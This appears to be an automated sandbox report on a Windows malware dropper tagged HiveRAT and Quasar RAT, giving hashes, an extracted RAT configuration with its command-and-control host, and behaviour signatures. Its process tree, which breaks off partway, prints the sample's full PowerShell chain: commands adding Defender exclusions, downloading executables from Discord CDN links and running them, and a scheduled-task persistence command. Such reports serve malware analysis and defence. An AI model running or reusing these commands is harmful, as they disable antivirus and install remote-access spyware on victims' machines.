hiverat | 1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57

Analysis

max time kernel
161s
max time network
169s
platform
windows10_x64
resource
win10-en-20211014
submitted
30-10-2021 09:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d7bda4ea100c3b9b58d9a9095628c064.exe
Size

72KB
MD5

d7bda4ea100c3b9b58d9a9095628c064
SHA1

70cb92dfc7e0dd76d7db1ee2877d87be8be8b638
SHA256

1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57
SHA512

56b0b05499881cd07aa9efb640d89b1debe2ac3e5378057b350f91d039056799859b53ad330e83af7f79d223bb234df2e1b32a40b3becc7c295049704606f424

Score

10^/10

hiverat quasar anubisv2 aspackv2 persistence rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip

Extracted

Family

quasar

Version

1.4.0

Botnet

Anubisv2

yoworldservices.space:1338

Mutex

48e1f30b-026f-45d4-b8f7-2bd40381b7db

Attributes

encryption_key
0411D8B9B23547F86733347B0634010F112E158F
install_name
dlscord.exe
log_directory
dlscordLogs
reconnect_delay
3000
startup_key
dlscord
subdirectory
dlscord

Signatures

HiveRAT
HiveRAT is an improved version of FirebirdRAT with various capabilities.
rat stealer hiverat

Quasar Payload 12 IoCs

resource	yara_rule
behavioral2/files/0x000600000001ab9f-970.dat	family_quasar
behavioral2/files/0x000600000001ab9f-976.dat	family_quasar
behavioral2/files/0x000600000001aba8-1014.dat	family_quasar
behavioral2/files/0x000600000001aba8-1013.dat	family_quasar
behavioral2/files/0x000600000001aba8-1028.dat	family_quasar
behavioral2/files/0x000600000001aba8-1040.dat	family_quasar
behavioral2/files/0x000600000001aba8-1054.dat	family_quasar
behavioral2/files/0x000600000001aba8-1066.dat	family_quasar
behavioral2/files/0x000600000001aba8-1078.dat	family_quasar
behavioral2/files/0x000600000001aba8-1090.dat	family_quasar
behavioral2/files/0x000600000001aba8-1102.dat	family_quasar
behavioral2/files/0x000600000001aba8-1112.dat	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

HiveRAT Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3872-878-0x000000000044CB2E-mapping.dmp	family_hiverat

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000500000001aba3-945.dat	aspack_v212_v242
behavioral2/files/0x000500000001aba3-944.dat	aspack_v212_v242

Blocklisted process makes network request 5 IoCs

flow	pid	Process
19	3264	powershell.exe
24	1372	powershell.exe
25	1184	powershell.exe
26	3368	powershell.exe
27	3984	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
3680	hivee.exe
3872	hivee.exe
3564	BITBACKK.exe
708	tbPLVy.exe
3264	dlscord.exe
932	dlscord.exe
2336	dlscord.exe
3528	dlscord.exe
1372	dlscord.exe
4092	dlscord.exe
2976	dlscord.exe
924	dlscord.exe
3108	dlscord.exe
3620	dlscord.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab9e-935.dat	upx
behavioral2/files/0x000600000001ab9e-941.dat	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Avast Essentials = "C:\\Users\\Admin\\AppData\\Roaming\\Avast.exe"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\spotiify = "C:\\Users\\Admin\\AppData\\Local\\spotiify\\spotiify.exe\ue600"	BITBACKK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\spotiify = "C:\\Users\\Admin\\AppData\\Local\\spotiify\\spotiify.exe"	BITBACKK.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3564	BITBACKK.exe
3564	BITBACKK.exe
3564	BITBACKK.exe
3564	BITBACKK.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3680 set thread context of 3872	3680	hivee.exe	86

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\ImagingDevices.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	tbPLVy.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jar.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\javacpl.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jconsole.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Time.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\klist.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxTsr.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\notification_helper.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate64.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Integrator.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateComRegisterShell64.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\rmiregistry.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jp2launcher.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\GameBar.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jarsigner.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\java.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jdeps.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\java.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\orbd.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javadoc.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jdb.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\idlj.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\unpack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Defender\MpUXSrv.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jstat.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jstatd.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\klist.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\pack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wab.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\schemagen.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\servertool.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jjs.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	tbPLVy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
952	schtasks.exe
1180	schtasks.exe
508	schtasks.exe
3144	schtasks.exe
3792	schtasks.exe
3560	schtasks.exe
1376	schtasks.exe
2336	schtasks.exe
1036	schtasks.exe
3264	schtasks.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	powershell.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2632	regedit.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
2720	PING.EXE
3136	PING.EXE
3208	PING.EXE
3184	PING.EXE
608	PING.EXE
3944	PING.EXE
60	PING.EXE
2896	PING.EXE
832	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2456	powershell.exe
652	powershell.exe
2456	powershell.exe
652	powershell.exe
652	powershell.exe
2456	powershell.exe
3568	powershell.exe
3568	powershell.exe
3568	powershell.exe
3264	powershell.exe
3264	powershell.exe
3264	powershell.exe
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
3368	powershell.exe
3368	powershell.exe
3368	powershell.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
700	powershell.exe
700	powershell.exe
3872	hivee.exe
3872	hivee.exe
700	powershell.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
4004	powershell.exe
4004	powershell.exe
3872	hivee.exe
3872	hivee.exe
4004	powershell.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe
3872	hivee.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3872	hivee.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	3680	hivee.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	3872	hivee.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	3264	dlscord.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeShutdownPrivilege	3564	BITBACKK.exe
Token: SeDebugPrivilege	932	dlscord.exe
Token: SeDebugPrivilege	2336	dlscord.exe
Token: SeDebugPrivilege	3528	dlscord.exe
Token: SeDebugPrivilege	1372	dlscord.exe
Token: SeDebugPrivilege	4092	dlscord.exe
Token: SeDebugPrivilege	2976	dlscord.exe
Token: SeDebugPrivilege	924	dlscord.exe
Token: SeDebugPrivilege	3108	dlscord.exe
Token: SeDebugPrivilege	3620	dlscord.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3564	BITBACKK.exe
3564	BITBACKK.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 3880	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2972 wrote to memory of 3880	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2972 wrote to memory of 3880	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2972 wrote to memory of 2240	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2972 wrote to memory of 2240	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2972 wrote to memory of 2240	2972	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2240 wrote to memory of 652	2240	cmd.exe	73
PID 3880 wrote to memory of 2456	3880	cmd.exe	72
PID 2240 wrote to memory of 652	2240	cmd.exe	73
PID 2240 wrote to memory of 652	2240	cmd.exe	73
PID 3880 wrote to memory of 2456	3880	cmd.exe	72
PID 3880 wrote to memory of 2456	3880	cmd.exe	72
PID 2240 wrote to memory of 3568	2240	cmd.exe	74
PID 2240 wrote to memory of 3568	2240	cmd.exe	74
PID 2240 wrote to memory of 3568	2240	cmd.exe	74
PID 2240 wrote to memory of 3264	2240	cmd.exe	75
PID 2240 wrote to memory of 3264	2240	cmd.exe	75
PID 2240 wrote to memory of 3264	2240	cmd.exe	75
PID 2240 wrote to memory of 1372	2240	cmd.exe	77
PID 2240 wrote to memory of 1372	2240	cmd.exe	77
PID 2240 wrote to memory of 1372	2240	cmd.exe	77
PID 2240 wrote to memory of 1184	2240	cmd.exe	78
PID 2240 wrote to memory of 1184	2240	cmd.exe	78
PID 2240 wrote to memory of 1184	2240	cmd.exe	78
PID 2240 wrote to memory of 3368	2240	cmd.exe	79
PID 2240 wrote to memory of 3368	2240	cmd.exe	79
PID 2240 wrote to memory of 3368	2240	cmd.exe	79
PID 2240 wrote to memory of 3984	2240	cmd.exe	80
PID 2240 wrote to memory of 3984	2240	cmd.exe	80
PID 2240 wrote to memory of 3984	2240	cmd.exe	80
PID 2240 wrote to memory of 3524	2240	cmd.exe	81
PID 2240 wrote to memory of 3524	2240	cmd.exe	81
PID 2240 wrote to memory of 3524	2240	cmd.exe	81
PID 3524 wrote to memory of 2632	3524	powershell.exe	82
PID 3524 wrote to memory of 2632	3524	powershell.exe	82
PID 3524 wrote to memory of 2632	3524	powershell.exe	82
PID 2240 wrote to memory of 3556	2240	cmd.exe	83
PID 2240 wrote to memory of 3556	2240	cmd.exe	83
PID 2240 wrote to memory of 3556	2240	cmd.exe	83
PID 3556 wrote to memory of 3680	3556	powershell.exe	84
PID 3556 wrote to memory of 3680	3556	powershell.exe	84
PID 3556 wrote to memory of 3680	3556	powershell.exe	84
PID 2240 wrote to memory of 2144	2240	cmd.exe	85
PID 2240 wrote to memory of 2144	2240	cmd.exe	85
PID 2240 wrote to memory of 2144	2240	cmd.exe	85
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3680 wrote to memory of 3872	3680	hivee.exe	86
PID 3872 wrote to memory of 1376	3872	hivee.exe	87
PID 3872 wrote to memory of 1376	3872	hivee.exe	87
PID 3872 wrote to memory of 1376	3872	hivee.exe	87
PID 3456 wrote to memory of 644	3456	explorer.exe	89
PID 3456 wrote to memory of 644	3456	explorer.exe	89
PID 2144 wrote to memory of 3564	2144	powershell.exe	90
PID 2144 wrote to memory of 3564	2144	powershell.exe	90
PID 2144 wrote to memory of 3564	2144	powershell.exe	90
PID 3564 wrote to memory of 708	3564	BITBACKK.exe	91
PID 3564 wrote to memory of 708	3564	BITBACKK.exe	91

C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe
"C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3524
  - - C:\Windows\SysWOW64\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\Cert.reg"
      4⤵
      Adds Run key to start application
      Runs .reg file with regedit
      PID:2632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Users\Admin\AppData\Roaming\hivee.exe
      "C:\Users\Admin\AppData\Roaming\hivee.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3680
    - - C:\Users\Admin\AppData\Roaming\hivee.exe
        
        "C:\Users\Admin\AppData\Roaming\hivee.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3872
      - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
        6⤵
        
        PID:1376
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Users\Admin\AppData\Roaming\BITBACKK.exe
      "C:\Users\Admin\AppData\Roaming\BITBACKK.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3564
    - - C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
        
        C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:708
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\20b758e0.bat" "
        6⤵
        
        PID:3096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:700
  - - C:\Users\Admin\AppData\Roaming\dlscord.exe
      "C:\Users\Admin\AppData\Roaming\dlscord.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3264
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:3144
    - - C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
